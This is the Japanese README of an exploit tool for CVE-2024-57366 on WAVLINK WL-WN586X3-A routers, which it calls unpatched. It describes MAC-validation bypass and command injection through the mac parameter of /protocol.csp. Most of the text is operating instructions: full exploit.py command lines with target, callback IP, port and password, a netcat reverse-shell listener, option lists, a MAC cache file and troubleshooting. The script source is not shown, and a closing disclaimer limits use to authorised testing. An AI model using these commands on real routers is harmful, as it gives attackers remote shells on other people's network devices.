
WAVLINK WL-WN586X3-A ルーター向け CVE-2024-57366 の製品化されたエクスプロイト (本リリース時点では未パッチ!)
CVE-2024-57366に対する堅牢なエクスプロイトです。MACアドレス検証のバイパスとコマンドインジェクションにより、脆弱なルーター上でリモートコード実行を可能にします。
これは認証後のエクスプロイトであり、ルーターの「リモートコントロール」機能がオンになっていることと、管理パスワードが必要です。管理者ユーザー名は「admin」にハードコードされています。
sudo アクセス(ネットワークインターフェース管理に必要)pip3 install requests
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Script will ask: "Use cached MAC for quick exploit? (y/n):" - say "y"
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123 --force-full
python3 exploit.py --list-cached
--target - ターゲットルーターのIPアドレス(デフォルト: 127.0.0.1)--port - ターゲットルーターのポート(デフォルト: 80)--local-ip - リバースシェルコールバック用のローカルIPアドレス--local-port - リバースシェルコールバック用のローカルポート(デフォルト: 4444)--password - ルーターの管理者パスワード--ssid - WiFiネットワーク名(デフォルト: WAVLINK-Mesh_DC4B)--force-full - フルエクスプロイトを強制し、キャッシュされたMACチェックをスキップ--list-cached - キャッシュされたMACアドレスを表示して終了CVE-2024-57366は、ルーターファームウェアのMACアドレス検証バイパスを悪用します。この脆弱性により、/protocol.csp エンドポイントの mac パラメータを介したコマンドインジェクションが可能になります。
eth0 インターフェースを使用index=1、トークンはURLパス内)エクスプロイトは成功したMACアドレスを自動的に successful_macs.txt にキャッシュします:
# CVE-2024-57366 Successful MAC Addresses
# Format: MAC_ADDRESS TARGET_IP TIMESTAMP
# You can manually add entries here
32:98:A2:A8:5F:5F 192.168.1.187 1758305048.0 # 2025-09-19 14:44:08
手動MAC追加: successful_macs.txt を編集して以下のような行を追加します:
AA:BB:CC:DD:EE:FF 192.168.1.100 1758305048.0 # 2025-09-19 14:44:08
# Start netcat listener
nc -lvp 4444
# Run exploit
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# When prompted to save MAC address, say "y"
# Start netcat listener
nc -lvp 4444
# Run exploit (will use cached MAC)
sudo python3 exploit.py --target 192.168.1.187 --local-ip 192.168.1.9 --local-port 4444 --password admin123
# Say "y" when asked about using cached MAC
「ワイヤレスアダプターが見つかりません」
sudo で実行してみる「MACアドレス検証に失敗しました」
「リクエストがタイムアウトしました」
「リバースシェルが接続しません」
--local-ip が正しいことを確認(ip addr show eth0 を使用)CVE-2024-57366/
├── exploit.py # Main exploit script
├── successful_macs.txt # MAC address cache (auto-generated)
└── README.md # This file
このツールは教育および許可されたテスト目的のみです。所有しているシステム、またはテストする明示的な許可があるシステムでのみ使用してください。作者はこのツールの誤用について一切責任を負いません。
/protocol.csp エンドポイントを介したコマンドインジェクションこのプロジェクトは現状のままで教育目的で提供されます。責任を持って、適用される法律や規制に従って使用してください。